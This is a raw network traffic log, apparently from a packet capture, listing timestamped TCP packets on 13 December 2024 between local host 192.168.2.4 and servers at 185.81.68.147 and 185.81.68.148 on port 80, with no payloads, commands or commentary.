Dec 13, 2024 07:47:45.801997900 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802014112 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802031040 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802054882 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802083015 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802104950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802165985 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802176952 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802176952 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802202940 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802223921 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802249908 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802270889 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802295923 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802316904 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802344084 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802371979 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802418947 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802418947 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802448988 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802469015 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802495003 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802515030 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802541018 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802560091 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802587986 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802613020 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.802635908 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.810957909 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.810957909 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.810957909 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811002970 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811017036 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811063051 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811110973 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811125040 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811147928 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811182022 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811202049 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811230898 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811295033 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811309099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811309099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811335087 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811357975 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811382055 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811410904 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811444998 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811476946 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811502934 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811532021 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811577082 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811590910 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811616898 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811633110 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811664104 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811686039 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811714888 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811742067 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811765909 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.811800003 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823174000 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823232889 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823232889 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823254108 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823282003 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823306084 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823340893 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823358059 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823379993 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823426962 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823426962 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823455095 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823518038 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823533058 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823545933 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823606968 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823651075 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823672056 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823715925 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823735952 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823802948 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823843002 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823863983 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823890924 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823913097 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823940992 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823968887 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.823996067 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.831269979 CET	80	49774	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:45.832856894 CET	49774	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:45.841177940 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841376066 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841412067 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841561079 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841595888 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841628075 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841734886 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841773987 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841808081 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841836929 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841866016 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841898918 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841932058 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.841967106 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842008114 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842037916 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842067003 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842104912 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842138052 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842174053 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842498064 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842541933 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842571974 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842679977 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842679977 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.842701912 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843095064 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843203068 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843203068 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843282938 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843338966 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843367100 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843390942 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843416929 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843462944 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843522072 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843564987 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843595982 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843628883 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843663931 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843691111 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843725920 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843784094 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843833923 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843858004 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843908072 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843944073 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.843980074 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844069004 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844116926 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844209909 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844233036 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844263077 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844285965 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844316959 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844405890 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844405890 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844429016 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844453096 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844481945 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844508886 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844579935 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844599009 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844624996 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844650030 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844679117 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844702005 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844726086 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844748974 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844774961 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844794989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844825983 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844842911 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844871998 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844892025 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844918013 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844939947 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844965935 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.844991922 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845216990 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845238924 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845268011 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845287085 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845313072 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845333099 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845360041 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845385075 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845413923 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845432997 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845458031 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845479012 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845506907 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845525980 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845554113 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845572948 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845602036 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845623016 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845648050 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845666885 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845691919 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845714092 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845742941 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845763922 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845789909 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845810890 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845835924 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845856905 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.845881939 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846003056 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846030951 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846052885 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846081018 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846097946 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846122980 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846143007 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846170902 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846199989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846276999 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846297979 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846326113 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846345901 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846374989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846436024 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846466064 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846488953 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846515894 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846539021 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846564054 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846585989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846615076 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846637011 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846667051 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846729994 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846755028 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846776009 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846801996 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846823931 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.846849918 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847116947 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847151041 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847364902 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847398043 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847423077 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847453117 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847475052 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847502947 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847527981 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847551107 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847572088 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847609043 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847635031 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847662926 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847681999 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847709894 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847733021 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847757101 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847779036 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847803116 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847822905 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847848892 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847870111 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847896099 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847914934 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847940922 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847965002 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.847990036 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848018885 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848128080 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848150969 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848176956 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848201036 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848228931 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848299980 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848328114 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848350048 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848376989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848400116 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848495007 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848540068 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848565102 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848593950 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848665953 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848694086 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848717928 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848743916 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848768950 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848794937 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848814964 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848841906 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848861933 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848886967 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848907948 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848937988 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848963022 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.848987103 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849174976 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849209070 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849232912 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849261045 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849280119 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849307060 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849330902 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849355936 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849380970 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849407911 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849427938 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849462986 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849487066 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849514008 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849536896 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849561930 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849584103 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849608898 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849632025 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849659920 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849680901 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849711895 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849728107 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849754095 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849773884 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849802017 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849826097 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849852085 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849869967 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849899054 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.849997997 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850032091 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850054979 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850083113 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850106001 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850131989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850155115 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850178957 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850198984 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850229025 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850301981 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850333929 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850357056 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850383043 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850404024 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850431919 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850454092 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850482941 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850507021 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850533962 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850553989 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850581884 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850601912 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850629091 CET	49776	80	192.168.2.4	185.81.68.147
